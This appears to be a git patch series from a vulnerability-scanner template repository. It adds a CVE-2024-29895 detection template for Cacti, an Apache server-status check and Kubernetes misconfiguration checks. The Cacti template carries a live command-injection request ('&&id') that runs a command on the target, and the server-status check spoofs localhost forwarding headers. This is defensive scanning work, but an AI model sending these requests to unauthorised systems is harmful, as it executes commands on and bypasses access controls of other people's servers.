2445673182..c8aa049b36 100644 --- a/http/exposures/backups/sql-server-dump.yaml +++ b/http/exposures/backups/sql-server-dump.yaml @@ -50,10 +50,10 @@ http: matchers-condition: and matchers: - type: binary - regex: + binary: - "54415045" # Microsoft Tape Format part: body - type: status status: - - 200 \ No newline at end of file + - 200 From 62ad67b550d9eca9ee5ec2c00421347c25f77089 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 16 May 2024 17:15:45 +0530 Subject: [PATCH 0021/1841] Create CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 37 ++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29895.yaml diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml new file mode 100644 index 0000000000..d396055b22 --- /dev/null +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -0,0 +1,37 @@ +id: CVE-2024-29895 + +info: + name: Test Injection in Cacti cmd_realtime.php + author: pussycat0x + severity: critical + description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. + reference: + - https://www.example.com/cve-xxxx-xxxx + - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 + - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d + - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc + - https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-29895 + cwe-id: CWE-77 + epss-score: 0.00045 + epss-percentile: 0.14626 + tags: cacti,injection + +http: + - method: GET + path: + - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + part: body From 249629c0f719aa92e0d709d5b0665c0d64b2aa73 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 17 May 2024 10:40:08 +0530 Subject: [PATCH 0022/1841] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index d396055b22..e1d505c885 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29895 info: - name: Test Injection in Cacti cmd_realtime.php + name: Cacti cmd_realtime.php - command injection author: pussycat0x severity: critical description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. @@ -33,5 +33,5 @@ http: - type: regex regex: - - ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" part: body From 18b8f552675dc4f7709a12f95d139e7e836d04ec Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 17 May 2024 10:40:39 +0530 Subject: [PATCH 0023/1841] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index e1d505c885..6908defba7 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-77 epss-score: 0.00045 epss-percentile: 0.14626 - tags: cacti,injection + tags: cve,cve2024,cacti,rce http: - method: GET From 7160a562671b6da7aaf4ff7d38b37367bffb80a2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 17 May 2024 10:43:46 +0530 Subject: [PATCH 0024/1841] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index 6908defba7..b22a709c5a 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -1,7 +1,7 @@ id: CVE-2024-29895 info: - name: Cacti cmd_realtime.php - command injection + name: Cacti cmd_realtime.php - command injection author: pussycat0x severity: critical description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. From 056bf96bb80315ccd9bf54a4526ddee1fb60c5ff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 13:49:18 +0530 Subject: [PATCH 0025/1841] minor update --- http/cves/2024/CVE-2024-29895.yaml | 26 +++++++++++++++++--------- 1 file changed, 17 insertions(+), 9 deletions(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index b22a709c5a..2497c33b26 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -1,12 +1,13 @@ id: CVE-2024-29895 info: - name: Cacti cmd_realtime.php - command injection + name: Cacti cmd_realtime.php - Command Injection author: pussycat0x severity: critical - description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances. + description: | + Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. reference: - - https://www.example.com/cve-xxxx-xxxx + - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc @@ -17,7 +18,14 @@ info: cve-id: CVE-2024-29895 cwe-id: CWE-77 epss-score: 0.00045 - epss-percentile: 0.14626 + epss-percentile: 0.14706 + metadata: + verified: true + max-request: 1 + vendor: cacti + product: cacti + shodan-query: http.favicon.hash:-1797138069 + fofa-query: icon_hash="-1797138069" tags: cve,cve2024,cacti,rce http: @@ -27,11 +35,11 @@ http: matchers-condition: and matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - type: status status: - 200 - - - type: regex - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - part: body From 1c4340b498dda1cad45e3a0a1624155895eacad8 Mon Sep 17 00:00:00 2001 From: NaN Date: Fri, 17 May 2024 01:08:22 -0700 Subject: [PATCH 0026/1841] Rename and move `server-status-localhost.yaml` --- .../apache-server-status-localhost.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/misconfiguration/{server-status-localhost.yaml => apache/apache-server-status-localhost.yaml} (100%) diff --git a/http/misconfiguration/server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml similarity index 100% rename from http/misconfiguration/server-status-localhost.yaml rename to http/misconfiguration/apache/apache-server-status-localhost.yaml From 5562d18125218380ce7eaa7a6dcce06d312530c2 Mon Sep 17 00:00:00 2001 From: NaN Date: Fri, 17 May 2024 01:20:17 -0700 Subject: [PATCH 0027/1841] Removing potential false positive results --- .../apache-server-status-localhost.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/http/misconfiguration/apache/apache-server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml index f471c93d28..3f2571c188 100644 --- a/http/misconfiguration/apache/apache-server-status-localhost.yaml +++ b/http/misconfiguration/apache/apache-server-status-localhost.yaml @@ -2,16 +2,24 @@ id: server-status-localhost info: name: Server Status Disclosure - author: pdteam,geeknik + author: pdteam,geeknik,NaN-kl severity: low description: Apache Server Status page is exposed, which may contain information about pages visited by the users, their IPs or sensitive information such as session tokens. metadata: - max-request: 1 + max-request: 2 tags: apache,debug,misconfig http: - method: GET - + path: + - "{{BaseURL}}/server-status" + headers: {} + matchers: + - type: status + status: + - 403 + - 404 + - method: GET headers: Forwarded: "127.0.0.1" X-Client-IP: "127.0.0.1" @@ -26,11 +34,12 @@ http: X-True-IP: "127.0.0.1" path: - "{{BaseURL}}/server-status" - matchers: - type: word words: - "Apache Server Status" - "Server Version" condition: and -# digest: 4a0a00473045022100978e79f5293059d77d7f12996faeb5e7327979bbdc03480dfaa632ce3692895002201fd20b313ef4e49782dca03918a3d53e057bdec80e366451c875c462b9992e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + +# digest: 4a0a00473045022100978e79f5293059d77d7f12996faeb5e7327979bbdc03480dfaa632ce3692895002201fd20b313ef4e49782dca03918a3d53e057bdec80e366451c875c462b9992e8d:922c64590222798bb761d5b6d8e72950 From acc747e7047539654d7b4db03d0f3a3a7c43de1e Mon Sep 17 00:00:00 2001 From: NaN Date: Fri, 17 May 2024 01:31:34 -0700 Subject: [PATCH 0028/1841] Fixed template ID to align with filename --- .../misconfiguration/apache/apache-server-status-localhost.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/apache/apache-server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml index 3f2571c188..707347d9d9 100644 --- a/http/misconfiguration/apache/apache-server-status-localhost.yaml +++ b/http/misconfiguration/apache/apache-server-status-localhost.yaml @@ -1,4 +1,4 @@ -id: server-status-localhost +id: apache-server-status-localhost info: name: Server Status Disclosure From 1f20bbb640aa47342935e11cb3f9d456350d73cd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 May 2024 14:24:28 +0530 Subject: [PATCH 0029/1841] trailspace fix --- http/cves/2024/CVE-2024-29895.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index 2497c33b26..d822ac3f4b 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: critical description: | - Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. + Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. reference: - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119 From 3c063d0a3aae693e66a74f8002fdcdebe27bdee8 Mon Sep 17 00:00:00 2001 From: NaN Date: Fri, 17 May 2024 15:24:58 -0700 Subject: [PATCH 0030/1841] lints --- .../apache-server-status-localhost.yaml | 39 +++++++++---------- 1 file changed, 18 insertions(+), 21 deletions(-) diff --git a/http/misconfiguration/apache/apache-server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml index 707347d9d9..5b26072d0e 100644 --- a/http/misconfiguration/apache/apache-server-status-localhost.yaml +++ b/http/misconfiguration/apache/apache-server-status-localhost.yaml @@ -1,19 +1,19 @@ +--- id: apache-server-status-localhost - info: name: Server Status Disclosure author: pdteam,geeknik,NaN-kl severity: low - description: Apache Server Status page is exposed, which may contain information about pages visited by the users, their IPs or sensitive information such as session tokens. + description: Apache Server Status page is exposed, which may contain information + about pages visited by the users, their IPs or sensitive information such as + session tokens. metadata: max-request: 2 tags: apache,debug,misconfig - http: - method: GET path: - "{{BaseURL}}/server-status" - headers: {} matchers: - type: status status: @@ -21,25 +21,22 @@ http: - 404 - method: GET headers: - Forwarded: "127.0.0.1" - X-Client-IP: "127.0.0.1" - X-Forwarded-By: "127.0.0.1" - X-Forwarded-For: "127.0.0.1" - X-Forwarded-For-IP: "127.0.0.1" - X-Forwarded-Host: "127.0.0.1" - X-Host: "127.0.0.1" - X-Originating-IP: "127.0.0.1" - X-Remote-Addr: "127.0.0.1" - X-Remote-IP: "127.0.0.1" - X-True-IP: "127.0.0.1" + Forwarded: 127.0.0.1 + X-Client-IP: 127.0.0.1 + X-Forwarded-By: 127.0.0.1 + X-Forwarded-For: 127.0.0.1 + X-Forwarded-For-IP: 127.0.0.1 + X-Forwarded-Host: 127.0.0.1 + X-Host: 127.0.0.1 + X-Originating-IP: 127.0.0.1 + X-Remote-Addr: 127.0.0.1 + X-Remote-IP: 127.0.0.1 + X-True-IP: 127.0.0.1 path: - "{{BaseURL}}/server-status" matchers: - type: word words: - - "Apache Server Status" - - "Server Version" - condition: and - - -# digest: 4a0a00473045022100978e79f5293059d77d7f12996faeb5e7327979bbdc03480dfaa632ce3692895002201fd20b313ef4e49782dca03918a3d53e057bdec80e366451c875c462b9992e8d:922c64590222798bb761d5b6d8e72950 + - Apache Server Status + - Server Version + condition: and \ No newline at end of file From aedfb3905a61d5df71b7d400ae70e1b0fb1b3a45 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 26 May 2024 08:52:23 +0400 Subject: [PATCH 0031/1841] =?UTF-8?q?k8s=20templates=20=F0=9F=9A=80?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../deployments/k8s-cpu-limits-not-set.yaml | 49 +++++++++++++++++ .../deployments/k8s-cpu-requests-not-set.yaml | 49 +++++++++++++++++ .../k8s-default-namespace-used.yaml | 48 +++++++++++++++++ .../k8s-host-network-namespace-shared.yaml | 47 +++++++++++++++++ .../k8s-image-pull-policy-always.yaml | 48 +++++++++++++++++ .../deployments/k8s-image-tag-not-fixed.yaml | 52 +++++++++++++++++++ .../k8s-liveness-probe-not-configured.yaml | 47 +++++++++++++++++ .../k8s-memory-limits-not-set.yaml | 47 +++++++++++++++++ .../k8s-memory-requests-not-set.yaml | 47 +++++++++++++++++ .../k8s-minimize-added-capabilities.yaml | 51 ++++++++++++++++++ .../deployments/k8s-privileged-container.yaml | 48 +++++++++++++++++ .../k8s-readiness-probe-not-set.yaml | 48 +++++++++++++++++ .../k8s-root-container-admission.yaml | 48 +++++++++++++++++ cloud/kubernetes/kubernetes-code-env.yaml | 31 +++++++++++ .../k8s-allow-privilege-escalation-set.yaml | 50 ++++++++++++++++++ .../pods/k8s-containers-share-host-ipc.yaml | 47 +++++++++++++++++ .../pods/k8s-host-pid-namespace-sharing.yaml | 47 +++++++++++++++++ cloud/kubernetes/pods/k8s-readonly-fs.yaml | 46 ++++++++++++++++ 18 files changed, 850 insertions(+) create mode 100644 cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml create mode 100644 cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml create mode 100644 cloud/kubernetes/deployments/k8s-default-namespace-used.yaml create mode 100644 cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml create mode 100644 cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml create mode 100644 cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml create mode 100644 cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml create mode 100644 cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml create mode 100644 cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml create mode 100644 cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml create mode 100644 cloud/kubernetes/deployments/k8s-privileged-container.yaml create mode 100644 cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml create mode 100644 cloud/kubernetes/deployments/k8s-root-container-admission.yaml create mode 100644 cloud/kubernetes/kubernetes-code-env.yaml create mode 100644 cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml create mode 100644 cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml create mode 100644 cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml create mode 100644 cloud/kubernetes/pods/k8s-readonly-fs.yaml diff --git a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml new file mode 100644 index 0000000000..1211e7285d --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml @@ -0,0 +1,49 @@ +id: k8s-cpu-limits-not-set + +info: + name: CPU limits not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing CPU limits in Kubernetes Deployments, which can lead to excessive CPU usage and affect other applications + impact: | + Missing CPU limits in Kubernetes Deployments can cause excessive CPU usage that can starve other applications, leading to performance degradation across the cluster. + remediation: | + Set CPU limits for all containers in Kubernetes Deployments to ensure fair CPU resource distribution and prevent performance issues. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.limits && container.resources.limits.cpu)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks CPU limits.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 490a0046304402205d1ddc90198898e6c233e5aac1742de397db7c2a70008e5fbc0676562a86894d0220088faf06d908f7d7dd8c9d0de8a20a120ed129962c78ce589abff2bc9402014a:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml new file mode 100644 index 0000000000..319677a594 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml @@ -0,0 +1,49 @@ +id: k8s-cpu-requests-not-set + +info: + name: CPU Requests not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing CPU requests in Kubernetes Deployments, which can lead to inadequate scheduling and resource allocation. + impact: | + Missing CPU requests in Kubernetes Deployments can cause poor scheduling decisions and suboptimal resource allocation, potentially leading to degraded application performance. + remediation: | + Set CPU requests for all containers in Kubernetes Deplayments to ensure efficient scheduling and resource allocation. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.requests && container.resources.requests.cpu)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks CPU requests.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502205bb61869d917787455c6863fe6115682cf34d1267258db863a2e6380ccc9049d022100b783912d411495b9b93ed83dbd6318049f59fc40574db2c881e9b82e95566e4d:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml new file mode 100644 index 0000000000..2a35ad6add --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-default-namespace-used.yaml @@ -0,0 +1,48 @@ +id: k8s-default-namespace-used + +info: + name: Default Namespace Usage in Deployments + author: princechaddha + severity: high + description: Checks if Kubernetes Deployments are using the default namespace, which can lead to security risks and mismanagement issues. + impact: | + Using the default namespace for Kubernetes Deployments can increase security risks as it might allow broader access than necessary. It also complicates resource management across multiple teams and applications. + remediation: | + Avoid using the default namespace for Kubernetes Deployments. Create and specify dedicated namespaces tailored to specific applications or teams to enhance security and manage resources effectively. + reference: + - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ + tags: cloud,devops,kubernetes,k8s,devsecops,namespaces + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.metadata.namespace.toLowerCase() === "default") { + let result = (`Deployment '${deployment.metadata.name}' is using the default namespace, which is not recommended.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100f48af70d2fd53e58592c7c951684543c97128981f343667899279760d37658fb022017c6dc9cbae1b0be18b1e11214bc5e1f51d909339c63b354a8d56a62f496ab79:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml b/cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml new file mode 100644 index 0000000000..50c0440a14 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml @@ -0,0 +1,47 @@ +id: k8s-host-network-namespace-shared + +info: + name: Host Network Namespace Sharing + author: princechaddha + severity: high + description: Checks if containers in Kubernetes Deployments are configured to share the host's network namespace, which can lead to security risks. + impact: | + Sharing the host's network namespace allows containers to access the host network directly. This can lead to potential security breaches as containers might bypass network policies and gain unrestricted network access on the host. + remediation: | + Ensure that the 'hostNetwork' field is set to false in all Kubernetes Deployments to prevent containers from sharing the host's network namespace. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces + tags: cloud,devops,kubernetes,k8s,devsecops,namespace + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.spec.template.spec.hostNetwork) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is configured to share the host's network namespace.`); + Export(result); + } + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100cd66750a4f7a5b20df75d62c2f9321edc46cac18cfd5599f45adc232248d3653022100dff978e8738723e829177c98c67e250a3fa1f9f5b8fa36db590af252c936ef73:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml new file mode 100644 index 0000000000..0a4adf49b8 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml @@ -0,0 +1,48 @@ +id: k8s-image-pull-policy-always + +info: + name: Image Pull Policy set to Always + author: princechaddha + severity: low + description: Ensures that Kubernetes deployments have the image pull policy set to 'Always', which guarantees the most up-to-date version of the image is used. + impact: | + Not setting the image pull policy to 'Always' may cause pods to use outdated versions of images, which can lead to security vulnerabilities if the images contain fixes or updates. + remediation: Update the image pull policy in Kubernetes Deployments to 'Always' to ensure that the latest container images are always used. + reference: + - https://kubernetes.io/docs/concepts/containers/images/#updating-images + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,images,docker + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.every(container => container.imagePullPolicy === 'Always')) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' does not have image pull policy set to Always.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450220107f47e2cbc8e9728548ec55c0d38b8a766eee58f47d2ef94709c87fb4080509022100b074dd509ae27478b66fa9d6157e952ce3f1764f66d70df3ad45afff361bf0cb:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml new file mode 100644 index 0000000000..7fffa3f8be --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml @@ -0,0 +1,52 @@ +id: k8s-image-tag-not-fixed + +info: + name: Image Tag should be fixed - not latest or blank + author: princechaddha + severity: low + description: Checks if Kubernetes Deployment container images are using tags other than 'latest' or blank, which can lead to unstable and unpredictable deployments. + impact: | + Using 'latest' or blank image tags can result in deploying non-reproducible container images, potentially leading to unexpected application behavior and difficulties in troubleshooting. + remediation: | + Use specific image tags for all containers in Kubernetes Deployments to ensure reproducibility and stability of application deployments. + reference: + - https://kubernetes.io/docs/concepts/containers/images/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + deployment.spec.template.spec.containers.forEach(container => { + const tag = container.image.split(':').pop(); + if (tag === 'latest' || tag === '') { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' uses 'latest' or blank image tag for container '${container.name}'.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100bd8016086ff77ceec6ef9605c3ceccd549832cca05a8682c4f3700baa158d0c7022042bb21d930467ea83c19d742cdb8a4c271c91267eb97375ac82cf945df9c27f6:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml new file mode 100644 index 0000000000..0b6043df6b --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml @@ -0,0 +1,47 @@ +id: k8s-liveness-probe-not-configured + +info: + name: Liveness Probe Not Configured in Deployments + author: princechaddha + severity: medium + description: Checks for missing liveness probes in Kubernetes Deployments, which are essential for managing container health and automatic recovery + impact: | + Absence of liveness probes can lead to unresponsive containers remaining in service, potentially degrading application performance and availability. + remediation: Configure liveness probes for all containers in Kubernetes Deployments to ensure proper health checks and automatic restarts of failing containers + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.livenessProbe)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks a configured liveness probe.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100e60638756964bc77d262b7457ee93f07c60fcfdfb8b8c9713be764334cba3d8e02210098435e5cb2898c8f1bbf07c33827dc5bde729593d17cbaa029e7acb9e7d55bda:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml new file mode 100644 index 0000000000..cfbf4e5252 --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml @@ -0,0 +1,47 @@ +id: k8s-memory-limits-not-set + +info: + name: Memory limits not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing memory limits in Kubernetes Deployments, which can lead to resource contention and instability + impact: | + Missing memory limits in Kubernetes Deployments can cause resource contention and potential application instability. + remediation: Set memory limits for all containers in Kubernetes Deployments to ensure resource management and application stability + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ + tags: cloud,devops,kubernetes,k8s,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.limits && container.resources.limits.memory)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks memory limits.`); + Export(result); + } + + extractors: + - type: dsl 